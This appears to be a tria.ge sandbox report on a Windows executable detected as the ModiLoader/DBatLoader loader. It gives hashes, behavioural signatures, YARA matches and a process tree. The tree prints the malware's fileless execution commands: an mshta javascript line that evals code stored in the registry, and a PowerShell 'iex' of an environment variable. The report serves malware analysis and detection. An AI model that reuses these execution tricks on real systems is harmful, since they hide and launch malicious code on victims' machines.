Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
162s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
04/10/2022, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
Resource
win10v2004-20220812-en
General
-
Target
b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe
-
Size
350KB
-
MD5
33e4035e409d8b1f24f6dbb42fbac637
-
SHA1
b1f91d896bf59b434cc164ea8dd440a82edbb543
-
SHA256
b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226
-
SHA512
7a68fe0be6e4ff29de7d9e563ddd3506d30a84fc76e1b57cc382db9043d54b44a5d61ad90352f1e8a957bc4b707e89584711ebfcbee926eed5d6a7df4002e08d
-
SSDEEP
6144:vZFPzNJtUTidCOKQzHaHXrFnk8iEgxeBgOCF+dg384dyzKX/GUaokGd:vvPzNJtUTidCMa3Rnk8iHxeBcggdszKh
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 4864 mshta.exe 83 -
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral2/memory/4208-133-0x0000000000400000-0x000000000045D000-memory.dmp modiloader_stage2 behavioral2/memory/4208-134-0x0000000002900000-0x00000000029C0000-memory.dmp modiloader_stage2 behavioral2/memory/4208-145-0x0000000002900000-0x00000000029C0000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4168 powershell.exe 4168 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4168 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1044 wrote to memory of 4168 1044 mshta.exe 85 PID 1044 wrote to memory of 4168 1044 mshta.exe 85 PID 1044 wrote to memory of 4168 1044 mshta.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe"C:\Users\Admin\AppData\Local\Temp\b4b2e6ec0267e86d67f98579945dab90f08608d6248db8340b6a95ae86813226.exe"1⤵PID:4208
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:zlNt0U4zqT="xOYUjE4QI";l6m=new%20ActiveXObject("WScript.Shell");gDgJkL96FL="ENF7g0h";QsI5F9=l6m.RegRead("HKLM\\software\\Wow6432Node\\6c11Ci\\wnsWfoW9");yxTzAi49K="B8e";eval(QsI5F9);MYLbfQ35x="BZI";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:tcej2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168
-